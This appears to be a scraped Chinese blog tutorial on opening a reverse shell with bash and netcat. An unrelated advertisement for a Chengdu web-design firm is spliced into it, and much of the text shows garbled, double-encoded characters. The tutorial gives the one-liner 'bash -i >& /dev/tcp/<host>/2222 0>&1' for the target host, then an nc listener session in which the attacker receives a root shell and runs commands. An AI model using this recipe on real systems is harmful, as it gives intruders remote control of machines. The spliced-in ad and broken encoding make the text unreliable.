bash是一個(gè)命令解釋語(yǔ)言，能夠執(zhí)行讀取標(biāo)準(zhǔn)輸入或文件的命令，可以執(zhí)行命令以及結(jié)合nc進(jìn)行反彈shell！

成都創(chuàng)新互聯(lián)公司-專(zhuān)業(yè)網(wǎng)站定制、快速模板網(wǎng)站建設(shè)、高性?xún)r(jià)比蘭溪網(wǎng)站開(kāi)發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫(kù),直接使用。一站式蘭溪網(wǎng)站制作公司更省心,省錢(qián),快速模板網(wǎng)站建設(shè)找我們，業(yè)務(wù)覆蓋蘭溪地區(qū)。費(fèi)用合理售后完善，10余年實(shí)體公司更值得信賴(lài)。

基本使用語(yǔ)法

bash -c 命令

root@kali:~# bash -c whoami
root
root@kali:~#

    另外使用-i表示以交互方式運(yùn)行shell，通常在目標(biāo)主機(jī)上運(yùn)行

bash -i >& /dev/tcp/192.168.5.1/2222 0>&1

    然后另一臺(tái)主機(jī)使用nc進(jìn)行監(jiān)聽(tīng)該端口，即可獲取到一個(gè)shell！

    目標(biāo)主機(jī)：

root@kali:~# bash -i >& /dev/tcp/192.168.5.1/2222 0>&1

    ***主機(jī)：

F:\\eth20-CTF-Toolkits\\CTF工具包\\連接工具>nc -lvp 2222
lstn on [any] 2222 ..
192.168.5.128: reverse hst chk phailed: h_errno 11004: NO_DATA
connect to [192.168.5.1] from (UNKNOWN) [192.168.5.128] 53418: NO_DATA
root@kali:~# uname -a
uname -a
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
root@kali:~# whoami
whoami
root
root@kali:~#exit